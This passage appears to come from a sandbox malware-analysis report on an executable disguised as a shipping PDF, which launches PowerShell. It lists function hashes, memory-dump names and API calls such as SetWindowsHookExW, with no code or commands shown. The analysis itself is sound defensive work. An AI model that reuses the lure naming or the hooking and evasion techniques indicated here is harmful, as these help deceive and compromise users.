4']q, xrefs: 04F987EB

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-2711123852
Opcode ID: 7fc17ca021766818be1b7fc10082f2a13169143c379012a308899a2fb1e8ffcc
Instruction ID: fd05b1b0e27395000f983d65892ee530064c144c9f324d08fca05bf761db4ec9
Opcode Fuzzy Hash: 7fc17ca021766818be1b7fc10082f2a13169143c379012a308899a2fb1e8ffcc
Instruction Fuzzy Hash: FF124034A002098FCB28EF75ED91A9D77B2FF46700F508569D049AB265DF34A94ACF92

Function 04F98320 Relevance: 41.7, Strings: 33, Instructions: 434COMMON

Download Yara Rule

Strings

4']q, xrefs: 04F98843
4']q, xrefs: 04F986E3
4']q, xrefs: 04F984E7
4']q, xrefs: 04F98793
4']q, xrefs: 04F98668
4']q, xrefs: 04F98550
4']q, xrefs: 04F987BF
4']q, xrefs: 04F9847E
4']q, xrefs: 04F985DC
4']q, xrefs: 04F98767
4']q, xrefs: 04F98817
4']q, xrefs: 04F9850A
4']q, xrefs: 04F984A1
4']q, xrefs: 04F9873B
4']q, xrefs: 04F98415
4']q, xrefs: 04F98438
4']q, xrefs: 04F985B9
4']q, xrefs: 04F983F2
4']q, xrefs: 04F98645
4']q, xrefs: 04F98622
4']q, xrefs: 04F9868B
4']q, xrefs: 04F985FF
4']q, xrefs: 04F986B7
4']q, xrefs: 04F98573
4']q, xrefs: 04F9845B
4']q, xrefs: 04F9852D
4']q, xrefs: 04F98596
4']q, xrefs: 04F988C7
4']q, xrefs: 04F9886F
4']q, xrefs: 04F984C4
4']q, xrefs: 04F9889B
4']q, xrefs: 04F9870F
4']q, xrefs: 04F987EB

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-2711123852
Opcode ID: 4203ab8a8064787c228a262642fe39caa3acc2ee8f021dc716e6fe3085f84de1
Instruction ID: f30893a70fabdf12f2f3b8af9aae2fb57aec9b7b5f985fb9e7550cd240c59452
Opcode Fuzzy Hash: 4203ab8a8064787c228a262642fe39caa3acc2ee8f021dc716e6fe3085f84de1
Instruction Fuzzy Hash: FE124E34A002098FCB28EF75ED91A9D77B2FF46700F508569D049AB265DF34A94ACF92

Function 04F944C0 Relevance: 12.7, Strings: 10, Instructions: 179COMMON

Download Yara Rule

Strings

4']q, xrefs: 04F9465A
4']q, xrefs: 04F946C3
4']q, xrefs: 04F9472C
4']q, xrefs: 04F946E6
4']q, xrefs: 04F945F1
4']q, xrefs: 04F94614
4']q, xrefs: 04F94709
4']q, xrefs: 04F9467D
4']q, xrefs: 04F946A0
4']q, xrefs: 04F94637

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-3121157708
Opcode ID: b90f9289c811e2726aaf7ac780c5db72a4cec251314115a6a651f77ae2bc2f4e
Instruction ID: be0a2153d13b5d6f6cc29e9c021dab0237ccfe3a7c625957e0fad712eb107a86
Opcode Fuzzy Hash: b90f9289c811e2726aaf7ac780c5db72a4cec251314115a6a651f77ae2bc2f4e
Instruction Fuzzy Hash: C1716231E0070A9FCB08EFB9D9505DDB7B2FF85300F618615D0597B265DB70698ACB81

Function 04F944D0 Relevance: 12.7, Strings: 10, Instructions: 172COMMON

Download Yara Rule

Strings

4']q, xrefs: 04F9465A
4']q, xrefs: 04F946C3
4']q, xrefs: 04F9472C
4']q, xrefs: 04F946E6
4']q, xrefs: 04F945F1
4']q, xrefs: 04F94614
4']q, xrefs: 04F94709
4']q, xrefs: 04F9467D
4']q, xrefs: 04F946A0
4']q, xrefs: 04F94637

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-3121157708
Opcode ID: 92ae969971903dd5575009e19bac41a0eb7e3fb2b86332700ea2aa8aeb4956c8
Instruction ID: 215ca46c8e33d3a57c5e1116485b594a14479f00309a80b82945f6143b78bc77
Opcode Fuzzy Hash: 92ae969971903dd5575009e19bac41a0eb7e3fb2b86332700ea2aa8aeb4956c8
Instruction Fuzzy Hash: 14714F31E0070A8FCB08EFB9E9505DDB7B6FF85700F618615D0597B265EB70698ACB81

Analysis Process: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exePID: 6608, Parent PID: 3608COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	32
Total number of Limit Nodes:	4

Executed Functions

Function 05E043B8 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4547362992.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5e00000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaeeba743de266a3219547147d255c0b89b70d9f84da97f3976e9700edb0a5fa
Instruction ID: f55fb5a129a0124c63563ba2b07f3b7bcefebb7bf48e29983576f62c29f8cc17
Opcode Fuzzy Hash: eaeeba743de266a3219547147d255c0b89b70d9f84da97f3976e9700edb0a5fa
Instruction Fuzzy Hash: 34415571E043959FCB14CFA9D8046AEBBF5FF89310F1485AAD544E7281DB789884CBE0

Function 02DBE6F0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02DBE77F

Memory Dump Source

Source File: 00000003.00000002.4533746829.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2db0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9d81c942eaa120ec7b098f82a5a3f814182133d44479da5b3c140e13a4291f05
Instruction ID: 97033f2d4dd99706cd1abe35310cfae30194d0660a9f110c07595a3b18ddf296
Opcode Fuzzy Hash: 9d81c942eaa120ec7b098f82a5a3f814182133d44479da5b3c140e13a4291f05
Instruction Fuzzy Hash: 6321D4B5D00248AFDB10CF9AD984ADEBBF9EF48310F14801AE919A7310D378A954CFA5

Function 02DBE6F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02DBE77F

Memory Dump Source

Source File: 00000003.00000002.4533746829.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2db0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 74ce561e3d403b538f7ff96e60bd08d48ac114a4a31b81e25422afa6c440a17e
Instruction ID: 684f321eca6aaccaaf66b41b94054b0ce01448d0c604db634c91387cd5987ea1
Opcode Fuzzy Hash: 74ce561e3d403b538f7ff96e60bd08d48ac114a4a31b81e25422afa6c440a17e
Instruction Fuzzy Hash: 9E21E3B59002089FDB10CF9AD984ADEBBF8FF48310F14801AE918A7310D378A944CFA0

Function 02DB9391 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02DB9413

Memory Dump Source

Source File: 00000003.00000002.4533746829.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2db0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: be2d06a17df177e2f036e0a349724e9f5c5466d1748014c9e6cca8d2a04013a7
Instruction ID: 8e730fd85e054ee1722f303da76df15a2df8418af6af69dbc801c5e352a93640
Opcode Fuzzy Hash: be2d06a17df177e2f036e0a349724e9f5c5466d1748014c9e6cca8d2a04013a7
Instruction Fuzzy Hash: 1B2123B59002498FCB14DFAAD954AEEBBF5FF88310F10842AE559A7350C774A940CFA1

Function 02DB9398 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02DB9413

Memory Dump Source

Source File: 00000003.00000002.4533746829.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2db0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: ebeb1aece4ae12ee5c5e2977dd3bcf3819b66343798d18544bc991bea267c56d
Instruction ID: 9264df84b8daf9bf8b7941910d455470f14516ef176f68612b8419cf34cb989b
Opcode Fuzzy Hash: ebeb1aece4ae12ee5c5e2977dd3bcf3819b66343798d18544bc991bea267c56d
Instruction Fuzzy Hash: 8A2104B59002498FCB14DF9AC954AEEBBF5FF88314F108429E519A7250C774A945CFA1

Function 05E0448A Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E0440A), ref: 05E044F7

Memory Dump Source

Source File: 00000003.00000002.4547362992.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5e00000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 83e81d111702e31b9854b7eaaa2fb96be17b01d6c39acea710c5b544a834ac5b
Instruction ID: ec6661a1fa1161d187ec05f5dbe74fcdea309fd6555e7c5b8ae38df3b0019c91
Opcode Fuzzy Hash: 83e81d111702e31b9854b7eaaa2fb96be17b01d6c39acea710c5b544a834ac5b
Instruction Fuzzy Hash: 9111F2B1C006599BDB10DF9AD945AEEFBF8FF48214F10816AE918A7240D778A9448FE1

Function 05E03CFC Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E0440A), ref: 05E044F7

Memory Dump Source

Source File: 00000003.00000002.4547362992.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5e00000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 5d08cf358aaee2c3543e109c7b561043eefc49e2a095587ec6b87ce5a60d82dc
Instruction ID: 748634583382719342f62723b47bd45c88936f66a2cdab22e0f773edb141b7bc
Opcode Fuzzy Hash: 5d08cf358aaee2c3543e109c7b561043eefc49e2a095587ec6b87ce5a60d82dc
Instruction Fuzzy Hash: 1B11F2B1C006599BCB10DF9AD544B9EFBF4FF48214F14816AD918A7280D378A984CFE5

Function 0132D53C Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4532902577.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_132d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e867e5552a55a6158bab7d1b8eeefe0a8cdccedca6490b9eb4b083e93750e1e2
Instruction ID: 3dce9b631e8307ce730e9fd97b866db1381003b7b1ac0019fe15c1f2d3601da7
Opcode Fuzzy Hash: e867e5552a55a6158bab7d1b8eeefe0a8cdccedca6490b9eb4b083e93750e1e2
Instruction Fuzzy Hash: 86214571100204DFCB06EF58D9C0F26BF69FB88328F30C569E9094B256C37AD416CBA1

Function 0133D0FC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4533053050.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_133d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48da8435f377197f638e0201562a88f17b5bcf6da8e985378571cc2748be00ec
Instruction ID: 6285884e0e86dbe64049d7cadd6b66a2470c65b701c08cbf170fac1346de6469
Opcode Fuzzy Hash: 48da8435f377197f638e0201562a88f17b5bcf6da8e985378571cc2748be00ec
Instruction Fuzzy Hash: EF21F2B19042049FDB45DFA8D980B26BBA9FBC8318F60C56DE90A4B256C37AD446CA61

Function 0133D01C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4533053050.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_133d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76491868a7d869141f0f1679c8e0679dd5aa771a6cd9f208f10569046014b1f2
Instruction ID: 24dc07a0b7b45fe8dac307de5e317a4e7cd06c8dde0fceb6dc5a7cbbc69a64a4
Opcode Fuzzy Hash: 76491868a7d869141f0f1679c8e0679dd5aa771a6cd9f208f10569046014b1f2
Instruction Fuzzy Hash: E321F271604204DFDB15DF68C5C0B26FF69EBC4B58F60C56DD9094B362C33AD846C661

Function 0133D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4533053050.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_133d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e79467754fbea6a020bbc2b2fb7dc665e5cfe9a1a82065931f5e2da9135ee4e
Instruction ID: 90d989abc7e1ff0595689251bb3bb4a92077d9c34252332c1ffa124348ab2d3e
Opcode Fuzzy Hash: 3e79467754fbea6a020bbc2b2fb7dc665e5cfe9a1a82065931f5e2da9135ee4e
Instruction Fuzzy Hash: 3D2192715083809FDB13CF24D984B15BF71EB86618F24C5EAD8498F2A3C33A9846CB62

Function 0132D537 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4532902577.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_132d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: e4ac475c331feccf86f823cf3e49fb1f5261a54c1cfecc9c1a8ff66ee9325a5b
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: CE11EE72404280CFCB12DF44D9C4B16BF72FB88328F24C6A9D9494B257C33AD45ACBA2

Function 0133D0F7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4533053050.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_133d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 56582a4a97642e2168c9385a9d10bddeca34c2cb398e17f0dfe6a02346b7c3b6
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 1511DD75904280CFDB06CF54D9C4B15BFB1FB84318F24C6A9D8494B256C33AD44ACBA2

Analysis Process: powershell.exePID: 4592, Parent PID: 6608COMMON

Executed Functions

Function 028CB490 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e120366d5daae444c2d336d5117a5aa8e297a92d1736e2e011be65d3d83b7c2e
Instruction ID: 3cd08ac5908554e2eeb1d9f54f5e169805917d34eac23707822ee0b144c41e43
Opcode Fuzzy Hash: e120366d5daae444c2d336d5117a5aa8e297a92d1736e2e011be65d3d83b7c2e
Instruction Fuzzy Hash: 1D917038F007199BDB19EFB484115AFBBA2EF84604B00C91DD55AAB344DF34AD0A8BD6

Function 028CB4A0 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d8b8ea25b0893937345a7d9cccca10d75a1114431b57f9a8216b4a4c45761c
Instruction ID: 4e83864af32aab2d009ae5e97e223fee1d01e7a2c00564764cd037dc720a6083
Opcode Fuzzy Hash: 37d8b8ea25b0893937345a7d9cccca10d75a1114431b57f9a8216b4a4c45761c
Instruction Fuzzy Hash: 95917138F007195BDB19EFB484115AFBBA2EF84604B00C91CD55AAB344DF74A90A8BD6

Function 07022308 Relevance: 14.4, Strings: 11, Instructions: 648COMMON

Download Yara Rule

Strings

rTl, xrefs: 0702254F
JUl, xrefs: 0702259E
JUl, xrefs: 070223C5
JUl, xrefs: 070223D1
JUl, xrefs: 0702237F
JUl, xrefs: 070225F6
4']q, xrefs: 07022619
4']q, xrefs: 0702260D
_, xrefs: 0702268E
rTl, xrefs: 07022559
JUl, xrefs: 070225EA

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$_$JUl$JUl$JUl$JUl$JUl$JUl$rTl$rTl
API String ID: 0-3943823830
Opcode ID: fe1fe092fbd6de8d3046903baed1bac1ceccbffe1966e0de03ceb34aeb1184bd
Instruction ID: 3e9f9d7d0324a47469e0278520ea6d8267e2a412ef6bcc973b2cb3c7e526795d
Opcode Fuzzy Hash: fe1fe092fbd6de8d3046903baed1bac1ceccbffe1966e0de03ceb34aeb1184bd
Instruction Fuzzy Hash: 712269B2B042268FCB559FA8C8406ABBBE6FF85310F15C57AD805CB251CB35C946D7A2

Function 07023CE8 Relevance: 5.6, Strings: 4, Instructions: 578COMMON

Download Yara Rule

Strings

4']q, xrefs: 07024026
4']q, xrefs: 07024030
4']q, xrefs: 07024180
4']q, xrefs: 0702418A

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 11a1d5cd2024730c2205114cbeead707114b1db526243f024ecb90a7feb6881a
Instruction ID: 2bd3760e012919200f33d0831b4af5d3edbf33ec60c465bd5f7182e78a85d3a1
Opcode Fuzzy Hash: 11a1d5cd2024730c2205114cbeead707114b1db526243f024ecb90a7feb6881a
Instruction Fuzzy Hash: C6128BB27042A18FCB158B78985176ABFE2AFC1314F1485AAE845CF392DB35CC47C7A1

Function 070217B8 Relevance: 2.8, Strings: 2, Instructions: 320COMMON

Download Yara Rule

Strings

Jl, xrefs: 0702192C
Jl, xrefs: 0702193A

Memory Dump Source

Source File: 00000004.00000002.2147182435.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7020000_powershell.jbxd

Similarity

API ID:
String ID: Jl$Jl
API String ID: 0-3456414871
Opcode ID: fb3ccace821fa45f1acbea84f2872d4fb1773c89a3871708c9d7c55c05816bef
Instruction ID: 23c3fc1cf7da4a2d914fb110c12d08559cc4adca5b7bf29628bc47efa19dcf64
Opcode Fuzzy Hash: fb3ccace821fa45f1acbea84f2872d4fb1773c89a3871708c9d7c55c05816bef
Instruction Fuzzy Hash: 67B159B270422EDFCB559F6CC4407AABBE6AFC6311F28C57AD4558B251DB31C842C7A2

Function 028CE779 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

JUl, xrefs: 028CE8AA

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: JUl
API String ID: 0-3583675650
Opcode ID: 726c9b1fbe8affa7435d6f99422fbc593297598b126039a39e9f0aa6b5df9ec5
Instruction ID: 6a9b21ef01d52a2f13d2cbf3f6905e597ef3564a3922e960b47fcd840365479b
Opcode Fuzzy Hash: 726c9b1fbe8affa7435d6f99422fbc593297598b126039a39e9f0aa6b5df9ec5
Instruction Fuzzy Hash: B6416234E052099FCB14DFB9E954AAEBBF6EF49300F108569E406E7351DB34AD09CB91

Function 028C6FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

(aq, xrefs: 028C7105

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: 535f8a90b3295bacc6b3b7c42edcac1ef18f26919f761aa6e7d272abd238a2bf
Instruction ID: 352ae8cd532a95811006e187b8bc18d2819819e1c6c9e6a004158dac22992c0e
Opcode Fuzzy Hash: 535f8a90b3295bacc6b3b7c42edcac1ef18f26919f761aa6e7d272abd238a2bf
Instruction Fuzzy Hash: 55413C38B042048FDB15DF68C454AAEBBF6AF89315F245499D906EB395DB31DC01CF61

Function 028CE7D0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

JUl, xrefs: 028CE8AA

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: JUl
API String ID: 0-3583675650
Opcode ID: 2e954bee2c02d9f1583889a309e9a3f2fd64f76de6c9c9fdbecdab0a66f8766d
Instruction ID: f260a9c194c7cb6542484cfdd50dfcdaee6e2093f8a75bdcd82d6ac04934a663
Opcode Fuzzy Hash: 2e954bee2c02d9f1583889a309e9a3f2fd64f76de6c9c9fdbecdab0a66f8766d
Instruction Fuzzy Hash: 7341C238A042049FC714CF78E954AEEBBF6EF49300F208568E406E7391CB34AD09CB91

Function 028CE800 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

JUl, xrefs: 028CE8AA

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: JUl
API String ID: 0-3583675650
Opcode ID: ceb7e4d4ccf4a02963fb7f0643e96e21e96457c9327c0c9c9c05fbdef4e6a92f
Instruction ID: 008e4fdd314e59e838de2ab156956674a15e41e5b4a190826c67a450fde51c70
Opcode Fuzzy Hash: ceb7e4d4ccf4a02963fb7f0643e96e21e96457c9327c0c9c9c05fbdef4e6a92f
Instruction Fuzzy Hash: 3E313C38E002099FDB14DF69D994A9EBBF6FF49300F208568D40AE7394DB34AD09CB91

Function 028CAFA8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

(&]q, xrefs: 028CAFCA

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID: (&]q
API String ID: 0-1343553580
Opcode ID: 9725e566400a38d977c929804f8eeb2d03528fa4e5d39b1df9623016068bdf05
Instruction ID: 17f2684f87a7208b2c30260e547f4055de4e957dd11b9824811b03c2fc7765a6
Opcode Fuzzy Hash: 9725e566400a38d977c929804f8eeb2d03528fa4e5d39b1df9623016068bdf05
Instruction Fuzzy Hash: 38219F75A002588FCB14DFAED4446AFBFF5AF89320F24846AD519E7340CB7598058BA5

Function 028CE978 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4c6abf1c7b6935f108ee06fe1a55335d73446e51c2fb1ce8b47fbc16d9e726f
Instruction ID: ce706c6b6a8fe7db67fe24a1d9a2cc3865756a5544a35be4c68f56327f562dc8
Opcode Fuzzy Hash: a4c6abf1c7b6935f108ee06fe1a55335d73446e51c2fb1ce8b47fbc16d9e726f
Instruction Fuzzy Hash: 50916B38B10219CFDB19DF69D55456EBBE6AF88704B24846AE806EB364DF34DC02CB91

Function 028C29F0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7713de716fd7d93d665e3205565b2b62b0135f3dbf2ba87bbce864c200f65727
Instruction ID: d9a30e8eae1e9adc8150e061fc69ac8294c8523b3b54668ba3344419e6d656f0
Opcode Fuzzy Hash: 7713de716fd7d93d665e3205565b2b62b0135f3dbf2ba87bbce864c200f65727
Instruction Fuzzy Hash: A0917B78A00205DFCB15CF5CC594AAAFBB1FF48310B248569D819EB3A9C735EC91CBA0

Function 028C7740 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99203868d668ff691be7b6b84e9ab8ccfd6c4146e2b5b53b3db5d280b190d2e2
Instruction ID: a64454c73ce5fed021a770b3b22b0854901cd0f091294fd5bc4942c470e6a1c9
Opcode Fuzzy Hash: 99203868d668ff691be7b6b84e9ab8ccfd6c4146e2b5b53b3db5d280b190d2e2
Instruction Fuzzy Hash: 3F51D0393042059FD705DB79E854A3ABBEEFF89215B2584BAE509CB352DB31DC01CBA0

Function 028CBAD0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2138059184.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

